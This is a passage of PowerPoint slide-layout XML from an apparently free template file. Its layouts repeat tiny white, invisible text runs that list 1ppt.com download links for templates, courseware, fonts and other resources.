              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout269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69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69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69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7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70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70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70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70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70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70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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout270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70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70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70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7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71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71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71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71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71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71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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout271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71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71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71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7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72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72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72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72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72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72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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
